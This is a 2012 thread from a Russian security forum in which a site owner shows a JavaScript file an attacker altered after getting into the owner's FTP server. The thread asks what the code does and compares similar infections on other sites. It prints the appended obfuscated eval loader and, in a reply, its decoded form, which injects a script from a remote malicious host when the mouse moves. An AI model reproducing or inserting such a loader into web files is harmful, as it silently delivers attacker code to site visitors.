The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Чего хотел взломщик?"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Информационная безопасность (Обнаружение и предотвращение атак)
Изначальное сообщение [ Отслеживать ]

"Чего хотел взломщик?"  –1 +/
Сообщение от ck80 (ok) on 12-Апр-12, 10:47 
Ubuntu server 9.10 + vsftpd 2.2.0-1

Сегодня утром просматривая отчёты logwatch, заметил что кто-то, каким-то образом подобрал пароль на наш ftp (пароль был f2t3p4!) и заменил все .js файлы на свои.

.js файлы лежали в то числе в Driver Pack Solution.

Оригинальный файл DRPSu12\tools\modules\resize.js
----------------------------------------------------------------
// On change size of the window
try {
    self.resizeTo(width,height - 25);
    self.moveTo((screen.width / 2) - (width / 2), (screen.height / 2) - (height / 2));
    //if (screen.width==640){
    if ((screen.width<width)||(screen.height<height)){
        self.resizeTo(800,600 - 25);
        self.moveTo(0,0);
        window.attachEvent('onload',function(){tooglePanel();});
    }
//    if (screen.height<height){ //On netbooks
//        window.attachEvent('onload',function(){
//            self.resizeTo(width,$(window).height() - 25);
//var callWidth = (screen.width / 2) - ($(window).width() / 2) - 23;
//var callHeight = (screen.height / 2) - (($(window).height()+80) / 2);
//alert((screen.height / 2));
//alert(($(window).height()+80) / 2);
//            self.moveTo((callWidth>0?callWidth:0), callHeight);
//        });
//    }
}
catch(err) { }
// Change title window
document.title = document.title + " " + version + " " + verType;


//Auto hide/show left panel
try {
    window.attachEvent('onresize',
        function(){
            if ($(window).width()<718){    //hide panel
                tooglePanel(false);
            }
            else if ($(window).width()>(800)){    //show panel
                tooglePanel(true);
            }
        }
    );
}
catch(err) { }
---------------------------------------------------------------------------------

Изменённый файл DRPSu12\tools\modules\resize.js
---------------------------------------------------------------------------------
// On change size of the window
try {
    self.resizeTo(width,height - 25);
    self.moveTo((screen.width / 2) - (width / 2), (screen.height / 2) - (height / 2));
    //if (screen.width==640){
    if ((screen.width<width)||(screen.height<height)){
        self.resizeTo(800,600 - 25);
        self.moveTo(0,0);
        window.attachEvent('onload',function(){tooglePanel();});
    }
//    if (screen.height<height){ //On netbooks
//        window.attachEvent('onload',function(){
//            self.resizeTo(width,$(window).height() - 25);
//var callWidth = (screen.width / 2) - ($(window).width() / 2) - 23;
//var callHeight = (screen.height / 2) - (($(window).height()+80) / 2);
//alert((screen.height / 2));
//alert(($(window).height()+80) / 2);
//            self.moveTo((callWidth>0?callWidth:0), callHeight);
//        });
//    }
}
catch(err) { }
// Change title window
document.title = document.title + " " + version + " " + verType;


//Auto hide/show left panel
try {
    window.attachEvent('onresize',
        function(){
            if ($(window).width()<718){    //hide panel
                tooglePanel(false);
            }
            else if ($(window).width()>(800)){    //show panel
                tooglePanel(true);
            }
        }
    );
}
catch(err) { }

c=3-1;i=c-2;if(window.document)if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){f=['0i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i78i57i74i-8i77i74i68i-8i21i-8i-1i64i76i76i72i18i7i7i14i81i79i59i80i70i75i6i78i77i63i74i76i74i65i68i74i71i6i75i61i68i62i65i72i6i59i71i69i7i63i7i-1i19i-27i-30i-31i65i62i-8i0i76i81i72i61i71i62i-8i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i-1i77i70i60i61i62i65i70i61i60i-1i1i-8i83i-27i-30i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i8i19i-27i-30i-31i85i-27i-30i-31i60i71i59i77i69i61i70i76i6i71i70i69i71i77i75i61i69i71i78i61i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i65i62i-8i0i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i21i21i-8i8i1i-8i83i-27i-30i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i9i19i-27i-30i-31i-31i-31i78i57i74i-8i64i61i57i60i-8i21i-8i60i71i59i77i69i61i70i76i6i63i61i76i29i68i61i69i61i70i76i75i26i81i44i57i63i38i57i69i61i0i-1i64i61i57i60i-1i1i51i8i53i19i-27i-30i-31i-31i-31i78i57i74i-8i75i59i74i65i72i76i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i75i59i74i65i72i76i-1i1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i76i81i72i61i-8i21i-8i-1i76i61i80i76i7i66i57i78i57i75i59i74i65i72i76i-1i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i74i61i57i60i81i75i76i57i76i61i59i64i57i70i63i61i-8i21i-8i62i77i70i59i76i65i71i70i-8i0i1i-8i83i-27i-30i-31i-31i-31i-31i65i62i-8i0i76i64i65i75i6i74i61i57i60i81i43i76i57i76i61i-8i21i21i-8i-1i59i71i69i72i68i61i76i61i-1i1i-8i83i-27i-30i-31i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i-31i85i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i71i70i68i71i57i60i-8i21i-8i62i77i70i59i76i65i71i70i0i1i-8i83i-27i-30i-31i-31i-31i-31i79i65i70i60i71i79i6i80i81i82i62i68i57i63i-8i21i-8i10i19i-27i-30i-31i-31i-31i85i19i-27i-30i-31i-31i-31i75i59i74i65i72i76i6i75i74i59i-8i21i-8i77i74i68i-8i3i-8i37i57i76i64i6i74i57i70i60i71i69i0i1i6i76i71i43i76i74i65i70i63i0i1i6i75i77i58i75i76i74i65i70i63i0i11i1i-8i3i-8i-1i6i66i75i-1i19i-27i-30i-31i-31i-31i64i61i57i60i6i57i72i72i61i70i60i27i64i65i68i60i0i75i59i74i65i72i76i1i19i-27i-30i-31i-31i85i-27i-30i-31i85i19i-27i-30i85i1i0i1i19'][0].split('i');v="ev"+"a"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;690!=i;i+=1){j=i;s+=r["fr"+"omC"+"harCode"](w[j]*1+40);}if(f)z=s;e(z);
-------------------------------------------------------------------------------------

Как видно, добавлен приличный кусок кода, Я догадываюсь, что это зашифрованное выполнение какой-то команды, но хотелось бы понять чего хотел взломщик? Расшифруйте, пожалуйста, кто может?

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Чего хотел взломщик?"  +1 +/
Сообщение от profalex on 12-Апр-12, 13:29 
> Как видно, добавлен приличный кусок кода, Я догадываюсь, что это зашифрованное выполнение
> какой-то команды, но хотелось бы понять чего хотел взломщик? Расшифруйте, пожалуйста,
> кто может?

Вот что:


(function() {
    var url = 'http://6ywcxns.vugrtrilro.selfip.com/g/';
    if (typeof window.xyzflag === 'undefined') {
        window.xyzflag = 0;
    }
    document.onmousemove = function() {
        if (window.xyzflag === 0) {
            window.xyzflag = 1;
            var head = document.getElementsByTagName('head')[0];
            var script = document.createElement('script');
            script.type = 'text/javascript';
            script.onreadystatechange = function () {
                if (this.readyState == 'complete') {
                    window.xyzflag = 2;
                }
            };
            script.onload = function() {
                window.xyzflag = 2;
            };
            script.src = url + Math.random().toString().substring(3) + '.js';
            head.appendChild(script);
        }
    };
})();

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Чего хотел взломщик?"  +1 +/
Сообщение от ck80 (ok) on 12-Апр-12, 13:37 
>> Как видно, добавлен приличный кусок кода, Я догадываюсь, что это зашифрованное выполнение
>> какой-то команды, но хотелось бы понять чего хотел взломщик? Расшифруйте, пожалуйста,
>> кто может?
> Вот что:
> (function() {
>  var url = 'http://6ywcxns.vugrtrilro.selfip.com/g/';
>  if (typeof window.xyzflag === 'undefined') {

Спасибо, ещё больше ничего не понятно.  :)

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

3. "Чего хотел взломщик?"  +1 +/
Сообщение от user (??) on 12-Апр-12, 15:32 
>>> Как видно, добавлен приличный кусок кода, Я догадываюсь, что это зашифрованное выполнение
>>> какой-то команды, но хотелось бы понять чего хотел взломщик? Расшифруйте, пожалуйста,
>>> кто может?
>> Вот что:
>> (function() {
>>  var url = 'http://6ywcxns.vugrtrilro.selfip.com/g/';
>>  if (typeof window.xyzflag === 'undefined') {
> Спасибо, ещё больше ничего не понятно.  :)

Че не понятно то? В страничку внедряется нечто скачиваемое с http://6ywcxns.vugrtrilro.selfip.com/g

Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

4. "Чего хотел взломщик?"  +1 +/
Сообщение от Алексей (??) on 13-Апр-12, 16:41 
>[оверквотинг удален]
>     }
>    };
>    script.onload = function() {
>     window.xyzflag = 2;
>    };
>    script.src = url + Math.random().toString().substring(3) + '.js';
>    head.appendChild(script);
>   }
>  };
> })();

Чем, если не секрет раскрыли бинарник?

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

5. "Чего хотел взломщик?"  +1 +/
Сообщение от Andrey Mitrofanov on 13-Апр-12, 16:46 
чем-чем, заменил e() в конце каким ни то print-ом.
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

6. "Чего хотел взломщик?"  +1 +/
Сообщение от freepaint email(ok) on 14-Апр-12, 01:30 
ЗДРАВСТВУЙТЕ!
СРОЧНО ОБЪЕДЕНЯЕМСЯ!!!
у меня тоже в ява кодах точно такой код на сайте
заметил примерно в то же время 12-13 апреля 2012 года.
давайте копать!!!

ВОТ МОИ КОНТАКТЫ:
IСИQ:   55-99-8-ноль
e_mail: freepainte(собчак)yandex.ru

Доступ ftp никому не довал
Хостинг: IHC.ru (намек на него)

Если узнаем кто это делает, то попробуем потрясти его хорошенько!
Прикинь, если это хостинг! )) вот мы его на бабки раскрутим!

в общем давай копать. жду!

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

7. "Чего хотел взломщик?"  +/
Сообщение от Alex (??) on 14-Апр-12, 23:04 
Ваш хостинг точно тут не причем, потому, что у меня заразились аналогичным вирусом сразу 5 разных сайтов. при этом они расположены на 2 разных хостингах.
Заражение всех сайтов на одном хостинге произошло примерно в одно и тоже время (дата обновления файлов на каждом сайте отличается всего на 1-2 мин), а вот на втором хостинге раньше на 1 день. Получается, что заражали сразу целыми хостингами.

Восстановить работоспособность сайтов удалось сразу, путем обновления файлов из резервной копии на локальном комьютере, но вот заражение мне кажется было не через FTP сайта, а непосредственно на сервере провайдера.
Кстати вот здесь есть скрипт, который вроде как лечит данную проблему:
https://gist.github.com/2359497/efb3d61a97231abdaa746ce8981d...
(сам я его не запускал, обновил всё через верезрвную копию, но возможно кому-то пригодиться.)

Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

8. "Чего хотел взломщик?"  +/
Сообщение от freepaint email(ok) on 15-Апр-12, 22:30 
>[оверквотинг удален]
> время (дата обновления файлов на каждом сайте отличается всего на 1-2
> мин), а вот на втором хостинге раньше на 1 день. Получается,
> что заражали сразу целыми хостингами.
> Восстановить работоспособность сайтов удалось сразу, путем обновления файлов из резервной
> копии на локальном комьютере, но вот заражение мне кажется было не
> через FTP сайта, а непосредственно на сервере провайдера.
> Кстати вот здесь есть скрипт, который вроде как лечит данную проблему:
> https://gist.github.com/2359497/efb3d61a97231abdaa746ce8981d...
> (сам я его не запускал, обновил всё через верезрвную копию, но возможно
> кому-то пригодиться.)

ПОЧЕМУ вы не постучались? (совершенно случайно второй раз попал на этот сайт из за вашего неответа! чуть не потерял с вами контакт) давайте решим эту проблему. ею все больше и большн заражаются разработчики и не знают в чем дело, т.к коды разные, но схема одна!!! все даты идут на 12 число!!! хотя софт и сервер у мене не менялись годами!!! скорее всего тот "черный админ" заготовил глобальные планы давным давно, вшив в "кое что" коды уязвимости какой то программы или сервера, завоевав максимум доверия на бездействии проснулся и начал свое черные дела, как нептун!
мая асъъко: 5 59 9 8 0

- проблема может быть во всем, и хостинг не был исключением, но я уже точно знаю что не хостинг (свои проверки)

вот к примеру еще одна наводка: странный FTP клиент от FIRE ZILLA portabe - пользуюсь им около 4 лет. Был скачен на очень крупном сайте типа ОпенФортча, он создавал портативные официальные версии программ по КОНТРАКТУ! возможно что то там у них не чисто хз. т.к на официальном сайте FIRE ZILLA в данный момент нет никаких наводок на этот сервис, да и вообще о портатиыной версии ВООБЩЕ!

после этого удалил ее нахер и скачал с ОпенФортча по ссылке с офсайта FIRE ZILLA!


давайте копать наконец то!
загвостка гдето на носу!


и кстати той утилитой по удалению подобного кода невозможно удалить динамический код.
а у меня этот вирус сделал динамику в содержимом, ява скриптов у меня около 100 шт на сервере, мне пришлось потратить более часа на его чистку(((((

Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

9. "Чего хотел взломщик?"  +/
Сообщение от ck80 (ok) on 16-Апр-12, 12:42 
>[оверквотинг удален]
> на официальном сайте FIRE ZILLA в данный момент нет никаких наводок
> на этот сервис, да и вообще о портатиыной версии ВООБЩЕ!
> после этого удалил ее нахер и скачал с ОпенФортча по ссылке с
> офсайта FIRE ZILLA!
> давайте копать наконец то!
> загвостка гдето на носу!
> и кстати той утилитой по удалению подобного кода невозможно удалить динамический код.
> а у меня этот вирус сделал динамику в содержимом, ява скриптов у
> меня около 100 шт на сервере, мне пришлось потратить более часа
> на его чистку(((((

У меня фтп не на хостинге, а на корпораитвном сервере.
На сервере стоит fail2ban, denyhost. Попыток подбора паролей не было. Судя по логам был сразу вход. ФТПшником пользуются несколько сотрудников. Я подозреваю, что кто-то из них заразился вирусом и вирус вытащил сохранённые пароли от ФТП

В логах сохранился IP взломщика: 50.115.122.28
Написал abuse по хуизу, ответили:

==========================================================
abuse@midphase.com
Hello,

Thank you for notifying of this abuse complaint. We have taken the necessary steps in order to resolve the incident. Please let us know if the situation arises again, or if you have any questions.

--
--
Kind Regards
--
Victoriya Ivanusa
100TB.com
==========================================================

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

10. "Чего хотел взломщик?"  +/
Сообщение от Alex email(??) on 16-Май-12, 20:39 
Числит сайт от этой хрени (кстати, появилась она с месяц назад, и вирусы её не ловили и пропускали как нормальный код) - все js перезаписала в конец. Код динамический в середине - начало и конец одинаковые, автозамена не прокатила. В итоге после очередного сообщения о вирусах на сайте вручную слил весь сайт и ручками поудалял этот код. Собственно, к чему это все :) Проблема не один раз почистить - а понять, как он туда попадает и предотвратить. Доступа прямого ни у кого нет, пароль отдельно от FTP клиента хранится?
Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

11. "Чего хотел взломщик?"  +/
Сообщение от Аноним (??) on 17-Май-12, 04:37 
> Числит сайт от этой хрени (кстати, появилась она с месяц назад, и
> вирусы её не ловили и пропускали как нормальный код) - все
> js перезаписала в конец. Код динамический в середине - начало и
> конец одинаковые, автозамена не прокатила. В итоге после очередного сообщения о
> вирусах на сайте вручную слил весь сайт и ручками поудалял этот
> код. Собственно, к чему это все :) Проблема не один раз
> почистить - а понять, как он туда попадает и предотвратить. Доступа
> прямого ни у кого нет, пароль отдельно от FTP клиента хранится?

нужно смотреть на дату изменения файлов (тут вы уже пролетели, конечно) и в логи (http, ftp) в которых искать, что было во в то время, когда менялись файлы.

Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Спонсоры:
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2021 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру